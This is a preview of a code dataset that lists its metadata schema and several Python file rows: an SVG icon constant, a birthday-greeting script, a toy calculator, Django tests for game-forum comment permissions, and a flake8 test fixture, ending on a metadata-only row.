Schema:

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | int64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
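
The three document-level statistics can be sanity-checked against a row's `content`. A minimal sketch, assuming the obvious definitions; the pipeline's exact accounting (newline and trailing-line handling) is not shown in this preview, so treat these as approximations:

```python
# Plausible reimplementation of the document-level statistic columns.
# These definitions are assumptions, not the dataset's actual code.
def basic_stats(content: str) -> dict:
    lines = content.splitlines()
    return {
        # reported values are consistent with total size / line count,
        # e.g. the calc.py row below: 135 bytes / 9 lines = 15.0
        "avg_line_length": len(content) / max(len(lines), 1),
        "max_line_length": max((len(line) for line in lines), default=0),
        "alphanum_fraction": sum(c.isalnum() for c in content) / max(len(content), 1),
    }

print(basic_stats("def add(a,b):\n    return a+b\n"))
```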

---

| field | value |
|---|---|
| hexsha | 17013762287a6697d4402a1f3e6382a1ad3d9628 |
| size | 751 |
| ext | py |
| lang | Python |
| max_stars_repo_path | octicons16px/bell.py |
| max_stars_repo_name | andrewp-as-is/octicons16px.py |
| max_stars_repo_head_hexsha | 1272dc9f290619d83bd881e87dbd723b0c48844c |
| max_stars_repo_licenses | ["Unlicense"] |
| max_stars_count | 1 |
| max_stars_repo_stars_event_min_datetime | 2021-01-28T06:47:39.000Z |
| max_stars_repo_stars_event_max_datetime | 2021-01-28T06:47:39.000Z |
| max_issues_repo_path | octicons16px/bell.py |
| max_issues_repo_name | andrewp-as-is/octicons16px.py |
| max_issues_repo_head_hexsha | 1272dc9f290619d83bd881e87dbd723b0c48844c |
| max_issues_repo_licenses | ["Unlicense"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | octicons16px/bell.py |
| max_forks_repo_name | andrewp-as-is/octicons16px.py |
| max_forks_repo_head_hexsha | 1272dc9f290619d83bd881e87dbd723b0c48844c |
| max_forks_repo_licenses | ["Unlicense"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |

content:

```python
OCTICON_BELL = """
<svg class="octicon octicon-bell" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16"><path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg>
"""
```

avg_line_length: 150.2 | max_line_length: 726 | alphanum_fraction: 0.679095

Quality-signal columns (`*_quality_signal`, in schema order):
181, 751, 2.812155, 0.513812, 0.02947, 0.011788, 0.015717, 0, 0, 0, 0, 0, 0, 0, 0.527859, 0.091878, 751, 4, 727, 187.75, 0.218475, 0, 0, 0, 0, 0.333333, 0.970667, 0.417333, 0, 0, 0, 0, 0, 1, 0, false, 0, 0, 0, 0, 0

Unsuffixed `qsc_*` columns (in schema order):
0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

effective: 0 | hits: 7
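Rows like the one above can be pulled into Python for inspection. A minimal sketch with the `datasets` library; `user/dataset` is a placeholder, since this preview does not name the repository:

```python
from datasets import load_dataset

# "user/dataset" is a placeholder repository id; substitute the real path.
ds = load_dataset("user/dataset", split="train", streaming=True)

for row in ds.take(3):
    print(row["hexsha"], row["max_stars_repo_name"], row["size"], row["hits"])
```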

---

| field | value |
|---|---|
| hexsha | ca3c3a4d1b08a136d1126ee54557eeb037d00db1 |
| size | 586 |
| ext | py |
| lang | Python |
| max_stars_repo_path | examples/happy_birthday.py |
| max_stars_repo_name | adam-weiler/HBD |
| max_stars_repo_head_hexsha | 2d5f41c8d592a0b387c5c1531e3b007e79338df3 |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | null |
| max_stars_repo_stars_event_min_datetime | null |
| max_stars_repo_stars_event_max_datetime | null |
| max_issues_repo_path | examples/happy_birthday.py |
| max_issues_repo_name | adam-weiler/HBD |
| max_issues_repo_head_hexsha | 2d5f41c8d592a0b387c5c1531e3b007e79338df3 |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | examples/happy_birthday.py |
| max_forks_repo_name | adam-weiler/HBD |
| max_forks_repo_head_hexsha | 2d5f41c8d592a0b387c5c1531e3b007e79338df3 |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |

content:

```python
user_name = input('Please enter your name:')
print (u'\n\u0048\u0061\u0070\u0070\u0079 \u0042\u0069\u0072\u0074\u0068\u0064\u0061\u0079 \u0074\u006F \u0079\u006F\u0075\u0021')
print (u'\u0048\u0061\u0070\u0070\u0079 \u0042\u0069\u0072\u0074\u0068\u0064\u0061\u0079 \u0074\u006F \u0079\u006F\u0075\u0021')
print (u'\u0048\u0061\u0070\u0070\u0079 \u0042\u0069\u0072\u0074\u0068\u0064\u0061\u0079\u002c \u0064\u0065\u0061\u0072 ' + user_name + '\u0021')
print (u'\u0048\u0061\u0070\u0070\u0079 \u0042\u0069\u0072\u0074\u0068\u0064\u0061\u0079 \u0074\u006F \u0079\u006F\u0075\u0021\u0021')
```

avg_line_length: 97.666667 | max_line_length: 145 | alphanum_fraction: 0.771331

Quality-signal columns (`*_quality_signal`, in schema order):
95, 586, 4.736842, 0.252632, 0.053333, 0.133333, 0.177778, 0.828889, 0.828889, 0.828889, 0.828889, 0.828889, 0.828889, 0, 0.541367, 0.051195, 586, 6, 146, 97.666667, 0.267986, 0, 0, 0, 0, 0.8, 0.850085, 0.71891, 0, 0, 0, 0, 0, 1, 0, false, 0, 0, 0, 0, 0.8

Unsuffixed `qsc_*` columns (in schema order):
0, 0, 0, null, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1

effective: 0 | hits: 14
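The `\uXXXX` escapes in this sample are ordinary ASCII codepoints, so the file is just a birthday greeting; decoding one of the literals shows this:

```python
# Each \uXXXX escape is a plain ASCII character (e.g. \u0048 == "H"),
# so the sample prints a "Happy Birthday" rhyme.
line = u'\u0048\u0061\u0070\u0070\u0079 \u0042\u0069\u0072\u0074\u0068\u0064\u0061\u0079 \u0074\u006F \u0079\u006F\u0075\u0021'
print(line)  # Happy Birthday to you!
```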

---

| field | value |
|---|---|
| hexsha | ca6c69956517b342f2e920516bfdc2ff5ea9eaf7 |
| size | 135 |
| ext | py |
| lang | Python |
| max_stars_repo_path | calc.py |
| max_stars_repo_name | Parkdoin/python_study |
| max_stars_repo_head_hexsha | 5a30bc8fe3c9e6c701d01a96dbb504a5ef188c3f |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | null |
| max_stars_repo_stars_event_min_datetime | null |
| max_stars_repo_stars_event_max_datetime | null |
| max_issues_repo_path | calc.py |
| max_issues_repo_name | Parkdoin/python_study |
| max_issues_repo_head_hexsha | 5a30bc8fe3c9e6c701d01a96dbb504a5ef188c3f |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | calc.py |
| max_forks_repo_name | Parkdoin/python_study |
| max_forks_repo_head_hexsha | 5a30bc8fe3c9e6c701d01a96dbb504a5ef188c3f |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |

content:

```python
def add(a,b):
return a+b
def multi(a,b):
return a*b
if __name__ == '__main__':
print(add(10,20))
print(multi(10,20))
```

avg_line_length: 15 | max_line_length: 26 | alphanum_fraction: 0.577778

Quality-signal columns (`*_quality_signal`, in schema order):
25, 135, 2.8, 0.48, 0.114286, 0.228571, 0.257143, 0.285714, 0, 0, 0, 0, 0, 0, 0.07767, 0.237037, 135, 9, 27, 15, 0.601942, 0, 0, 0, 0, 0, 0.058824, 0, 0, 0, 0, 0, 0, 1, 0.285714, false, 0, 0, 0.285714, 0.571429, 0.285714

Unsuffixed `qsc_*` columns (in schema order):
1, 0, 0, null, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0

effective: 0 | hits: 7
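The fractional signals for this row read directly off the source: two of its seven lines are `def` lines and two are `print` calls, consistent with `qsc_codepython_frac_lines_func_ratio` = `qsc_codepython_frac_lines_print` = 2/7 ≈ 0.285714 and `qsc_codepython_score_lines_no_logic` = 4/7 ≈ 0.571429 above.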

---

| field | value |
|---|---|
| hexsha | f3d6bf494899c3075514f1713945a98e7d3a4a31 |
| size | 15887 |
| ext | py |
| lang | Python |
| max_stars_repo_path | tests/gameforum/test_game_comments.py |
| max_stars_repo_name | kozzztik/tulius |
| max_stars_repo_head_hexsha | 81b8f6484eefdc453047f62173a08f5e6f640cd6 |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | 1 |
| max_stars_repo_stars_event_min_datetime | 2020-04-21T15:09:18.000Z |
| max_stars_repo_stars_event_max_datetime | 2020-04-21T15:09:18.000Z |
| max_issues_repo_path | tests/gameforum/test_game_comments.py |
| max_issues_repo_name | kozzztik/tulius |
| max_issues_repo_head_hexsha | 81b8f6484eefdc453047f62173a08f5e6f640cd6 |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | 70 |
| max_issues_repo_issues_event_min_datetime | 2019-04-10T22:32:32.000Z |
| max_issues_repo_issues_event_max_datetime | 2022-03-11T23:12:54.000Z |
| max_forks_repo_path | tests/gameforum/test_game_comments.py |
| max_forks_repo_name | kozzztik/tulius |
| max_forks_repo_head_hexsha | 81b8f6484eefdc453047f62173a08f5e6f640cd6 |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | 1 |
| max_forks_repo_forks_event_min_datetime | 2019-04-12T14:55:39.000Z |
| max_forks_repo_forks_event_max_datetime | 2019-04-12T14:55:39.000Z |

content:

```python
from django.db import transaction
from tulius.forum.threads import models as forum_threads
from tulius.gameforum.threads import models as thread_models
from tulius.stories import models as story_models
from tulius.games import models as game_models
def test_comments_api(
game, variation_forum, user, murderer, detective, admin):
game.status = game_models.GAME_STATUS_IN_PROGRESS
with transaction.atomic():
game.save()
base_url = f'/api/game_forum/variation/{game.variation.id}/'
# create thread with "no read" and no role
response = admin.put(
variation_forum.get_absolute_url(), {
'title': 'thread', 'body': 'thread description',
'room': False,
'default_rights': forum_threads.ACCESS_READ,
'granted_rights': [], 'important': False, 'media': {}})
assert response.status_code == 200
thread = response.json()
# try to add comment with user
response = user.post(
thread['url'] + 'comments_page/', {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'media': {}, 'role_id': detective.pk,
})
assert response.status_code == 403
# add rights to write
response = admin.post(
thread['url'] + 'granted_rights/', {
'user': {'id': detective.pk},
'access_level': forum_threads.ACCESS_WRITE
}
)
assert response.status_code == 200
# try again
response = user.post(
thread['url'] + 'comments_page/', {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'media': {}, 'role_id': detective.pk,
})
assert response.status_code == 200
data = response.json()
comment = data['comments'][1]
assert comment['title'] == 'Hello'
assert comment['body'] == 'my comment is awesome'
assert comment['user']['id'] == detective.pk
assert comment['user']['title'] == detective.name
# update comment
response = user.post(
comment['url'], {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome2',
'media': {}, 'role_id': detective.pk, 'edit_role_id': detective.pk,
})
assert response.status_code == 200
data = response.json()
assert data['body'] == 'my comment is awesome2'
# try to update with wrong role
response = user.post(
comment['url'], {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome3',
'media': {}, 'role_id': murderer.pk, 'edit_role_id': detective.pk,
})
assert response.status_code == 403
# try to update with wrong editor
response = user.post(
comment['url'], {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome3',
'media': {}, 'role_id': detective.pk, 'edit_role_id': murderer.pk,
})
assert response.status_code == 403
# check body not changed in this attempts
response = user.get(comment['url'])
assert response.status_code == 200
data = response.json()
assert data['body'] == 'my comment is awesome2'
assert data['user']['id'] == detective.pk
# check comments counters
response = admin.get(base_url)
assert response.status_code == 200
data = response.json()
assert data['characters'][0]['id'] == murderer.pk
assert data['characters'][0]['comments_count'] == 0
assert data['characters'][1]['id'] == detective.pk
assert data['characters'][1]['comments_count'] == 1
variation = story_models.Variation.objects.get(pk=data['id'])
assert variation.comments_count == 2
# check role update works
response = admin.post(
comment['url'], {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome3',
'media': {}, 'role_id': murderer.pk, 'edit_role_id': detective.pk,
})
assert response.status_code == 200
data = response.json()
assert data['body'] == 'my comment is awesome3'
assert data['user']['id'] == murderer.pk
assert data['user']['title'] == murderer.name
assert data['editor']['id'] == detective.pk
assert data['editor']['title'] == detective.name
# check comments counters again
response = admin.get(base_url)
assert response.status_code == 200
data = response.json()
assert data['characters'][0]['id'] == murderer.pk
assert data['characters'][0]['comments_count'] == 1
assert data['characters'][1]['id'] == detective.pk
assert data['characters'][1]['comments_count'] == 0
variation = story_models.Variation.objects.get(pk=data['id'])
assert variation.comments_count == 2
# delete comment
response = user.delete(comment['url'] + '?comment=moo')
assert response.status_code == 200
# and check counters
response = admin.get(base_url)
assert response.status_code == 200
data = response.json()
assert data['characters'][0]['id'] == murderer.pk
assert data['characters'][0]['comments_count'] == 0
assert data['characters'][1]['id'] == detective.pk
assert data['characters'][1]['comments_count'] == 0
variation = story_models.Variation.objects.get(pk=data['id'])
assert variation.comments_count == 1
def test_comments_illustrations(
game, variation_forum, user, detective, story_illustration,
variation_illustration):
game.status = game_models.GAME_STATUS_IN_PROGRESS
with transaction.atomic():
game.save()
base_url = f'/api/game_forum/variation/{game.variation.id}/'
# create thread with illustration
response = user.put(
base_url + f'thread/{variation_forum.id}/', {
'title': 'thread', 'body': 'thread description',
'room': False,
'default_rights': None,
'granted_rights': [], 'role_id': detective.pk, 'media': {
'illustrations': [{
'id': story_illustration.pk,
'foo': 'bar'
}]
}})
assert response.status_code == 200
thread = response.json()
assert len(thread['media']['illustrations']) == 1
entity = thread['media']['illustrations'][0]
assert entity['id'] == story_illustration.pk
assert entity['title'] == story_illustration.name
# change illustration
response = user.post(
thread['url'], {
'title': 'thread', 'body': 'thread description',
'role_id': detective.pk, 'edit_role_id': detective.pk,
'media': {'illustrations': [{
'id': variation_illustration.pk,
'foo': 'bar'
}]}})
assert response.status_code == 200
thread = response.json()
assert len(thread['media']['illustrations']) == 1
entity = thread['media']['illustrations'][0]
assert entity['id'] == variation_illustration.pk
assert entity['title'] == variation_illustration.name
# Do illustration delete
response = user.post(
thread['url'], {
'title': 'thread', 'body': 'thread description',
'role_id': detective.pk, 'edit_role_id': detective.pk,
'media': {'illustrations': []}})
assert response.status_code == 200
thread = response.json()
assert 'illustrations' not in thread['media']
# try to add comment with illustration
response = user.post(
thread['url'] + 'comments_page/', {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'role_id': detective.pk,
'media': {
'illustrations': [{
'id': story_illustration.pk,
'foo': 'bar'
}]
}})
assert response.status_code == 200
data = response.json()
comment = data['comments'][1]
assert len(comment['media']['illustrations']) == 1
entity = comment['media']['illustrations'][0]
assert entity['id'] == story_illustration.pk
assert entity['title'] == story_illustration.name
# change illustration
response = user.post(
comment['url'], {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'role_id': detective.pk, 'edit_role_id': detective.pk,
'media': {
'illustrations': [{
'id': variation_illustration.pk,
'foo': 'bar'
}]
}})
assert response.status_code == 200
data = response.json()
entity = data['media']['illustrations'][0]
assert entity['id'] == variation_illustration.pk
assert entity['title'] == variation_illustration.name
# remove illustration from comment
response = user.post(
comment['url'], {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'role_id': detective.pk, 'edit_role_id': detective.pk,
'media': {
'illustrations': []
}})
assert response.status_code == 200
data = response.json()
assert 'illustrations' not in data['media']
def test_broken_last_comment(game, variation_forum, user, detective):
game.status = game_models.GAME_STATUS_IN_PROGRESS
with transaction.atomic():
game.save()
base_url = f'/api/game_forum/variation/{game.variation.id}/'
# create thread
response = user.put(
base_url + f'thread/{variation_forum.id}/', {
'title': 'thread', 'body': 'thread description',
'room': False,
'default_rights': None,
'granted_rights': [], 'role_id': detective.pk, 'media': {}
})
assert response.status_code == 200
thread = response.json()
# break last comment
obj = thread_models.Thread.objects.get(pk=thread['id'])
obj.last_comment[user.user.pk] += 1
obj.save()
# check room view still works
response = user.get(base_url + f'thread/{variation_forum.id}/')
assert response.status_code == 200
data = response.json()
assert 'last_comment' not in data['threads'][0]
def test_delete_game_comments_with_thread(
game, variation_forum, detective, murderer, admin):
game.status = game_models.GAME_STATUS_IN_PROGRESS
with transaction.atomic():
game.save()
# create room
response = admin.put(
variation_forum.get_absolute_url(), {
'title': 'thread', 'body': 'thread description',
'room': True,
'default_rights': None,
'granted_rights': []})
assert response.status_code == 200
room = response.json()
# create thread
response = admin.put(
room['url'], {
'title': 'thread', 'body': 'thread description',
'room': False,
'default_rights': None,
'granted_rights': [], 'role_id': detective.pk, 'media': {}
})
assert response.status_code == 200
thread = response.json()
# create second detective comment
response = admin.post(
thread['url'] + 'comments_page/', {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'role_id': detective.pk,
'media': {}})
assert response.status_code == 200
# create murderer comment
response = admin.post(
thread['url'] + 'comments_page/', {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'role_id': murderer.pk,
'media': {}})
assert response.status_code == 200
# check comments counts
assert story_models.Role.objects.get(pk=detective.pk).comments_count == 2
assert story_models.Role.objects.get(pk=murderer.pk).comments_count == 1
# delete room
response = admin.delete(room['url'] + '?comment=die')
assert response.status_code == 200
# check comments counts
assert story_models.Role.objects.get(pk=detective.pk).comments_count == 0
assert story_models.Role.objects.get(pk=murderer.pk).comments_count == 0
def test_game_comment_counters_on_rights_change(
game, variation_forum, user, detective, admin):
game.status = game_models.GAME_STATUS_IN_PROGRESS
with transaction.atomic():
game.save()
# create room
response = admin.put(
variation_forum.get_absolute_url(), {
'title': 'room', 'body': 'thread description',
'room': True,
'default_rights': None,
'granted_rights': [], 'role_id': None, 'media': {}})
assert response.status_code == 200
room = response.json()
# create room
response = admin.put(
room['url'], {
'title': 'thread', 'body': 'thread description',
'room': False,
'default_rights': None,
'granted_rights': [], 'role_id': None, 'media': {}})
assert response.status_code == 200
thread = response.json()
# check initial state
response = admin.get(variation_forum.get_absolute_url())
assert response.status_code == 200
data = response.json()
assert data['rooms'][0]['last_comment']['id']
assert data['rooms'][0]['comments_count'] == 1
response = user.get(variation_forum.get_absolute_url())
assert response.status_code == 200
data = response.json()
assert data['rooms'][0]['last_comment']['id']
assert data['rooms'][0]['comments_count'] == 1
# close thread
response = admin.put(
thread['url'] + 'granted_rights/', {
'default_rights': forum_threads.NO_ACCESS})
assert response.status_code == 200
# check counters, admin still see
response = admin.get(variation_forum.get_absolute_url())
assert response.status_code == 200
data = response.json()
assert data['rooms'][0]['last_comment']['id']
assert data['rooms'][0]['comments_count'] == 1
# but anonymous user is not
response = user.get(variation_forum.get_absolute_url())
assert response.status_code == 200
data = response.json()
assert 'last_comment' not in data['rooms'][0]
assert data['rooms'][0]['comments_count'] == 0
def test_game_comment_counters_on_thread_delete(
game, variation_forum, user, detective, admin):
game.status = game_models.GAME_STATUS_IN_PROGRESS
with transaction.atomic():
game.save()
# Create room in root room
response = admin.put(
variation_forum.get_absolute_url(), {
'title': 'room1', 'body': 'room1 description',
'room': True, 'default_rights': None, 'role_id': None,
'granted_rights': []})
assert response.status_code == 200
room = response.json()
# create thread
response = admin.put(
room['url'], {
'title': 'thread1', 'body': 'thread1 description',
'room': False, 'default_rights': None, 'role_id': None,
'granted_rights': [], 'media': {}})
assert response.status_code == 200
thread = response.json()
# check initial state
response = admin.get(variation_forum.get_absolute_url())
assert response.status_code == 200
data = response.json()
assert data['rooms'][0]['last_comment']['id']
assert data['rooms'][0]['comments_count'] == 1
# delete thread
response = admin.delete(thread['url'] + '?comment=wow')
assert response.status_code == 200
# check counters
response = admin.get(variation_forum.get_absolute_url())
assert response.status_code == 200
data = response.json()
assert 'last_comment' not in data['rooms'][0]
assert data['rooms'][0]['comments_count'] == 0
```

avg_line_length: 39.618454 | max_line_length: 79 | alphanum_fraction: 0.605967

Quality-signal columns (`*_quality_signal`, in schema order):
1805, 15887, 5.171745, 0.072576, 0.05699, 0.081414, 0.097697, 0.832458, 0.799036, 0.78661, 0.774076, 0.764542, 0.743546, 0, 0.014974, 0.247561, 15887, 400, 80, 39.7175, 0.765936, 0.056335, 0, 0.803468, 0, 0, 0.204267, 0.014849, 0, 0, 0, 0, 0.274566, 1, 0.017341, false, 0, 0.017341, 0, 0.034682, 0

Unsuffixed `qsc_*` columns (in schema order):
0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

effective: 0 | hits: 7

---

| field | value |
|---|---|
| hexsha | f3f169c8c45321f9a839bffa06b487aeb8e6ba32 |
| size | 16 |
| ext | py |
| lang | Python |
| max_stars_repo_path | tests/test_files/commented_names.py |
| max_stars_repo_name | atuchak/flake8-variables-names |
| max_stars_repo_head_hexsha | 10915c2c0cdd4ed5ef879b5f57ef55894219150b |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | 43 |
| max_stars_repo_stars_event_min_datetime | 2019-03-23T06:59:05.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-03-16T16:34:44.000Z |
| max_issues_repo_path | tests/test_files/commented_names.py |
| max_issues_repo_name | atuchak/flake8-variables-names |
| max_issues_repo_head_hexsha | 10915c2c0cdd4ed5ef879b5f57ef55894219150b |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | 8 |
| max_issues_repo_issues_event_min_datetime | 2019-04-04T01:09:45.000Z |
| max_issues_repo_issues_event_max_datetime | 2022-02-24T12:42:14.000Z |
| max_forks_repo_path | tests/test_files/commented_names.py |
| max_forks_repo_name | atuchak/flake8-variables-names |
| max_forks_repo_head_hexsha | 10915c2c0cdd4ed5ef879b5f57ef55894219150b |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | 10 |
| max_forks_repo_forks_event_min_datetime | 2019-03-23T06:59:09.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-01-28T12:50:55.000Z |

content:

```python
# a = 0
# b = 1
```

avg_line_length: 5.333333 | max_line_length: 7 | alphanum_fraction: 0.25

Quality-signal columns (`*_quality_signal`, in schema order):
4, 16, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.25, 0.5, 16, 2, 8, 8, 0.25, 0.6875, 0, null, 0, null, 0, 0, null, 0, 0, 0, null, 1, null, true, 0, 0, null, null, null

Unsuffixed `qsc_*` columns (in schema order):
1, 1, 1, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0

effective: 0 | hits: 7

---

| field | value |
|---|---|
| hexsha | 6d34d45d590071b981fdc0c89e47ad6f7fd01515 |
| size | 18397 |
| ext | py |
| lang | Python |
| max_stars_repo_path | Devil/Devil.py |
| max_stars_repo_name | shyamjangid07/Reverse-Engineering |
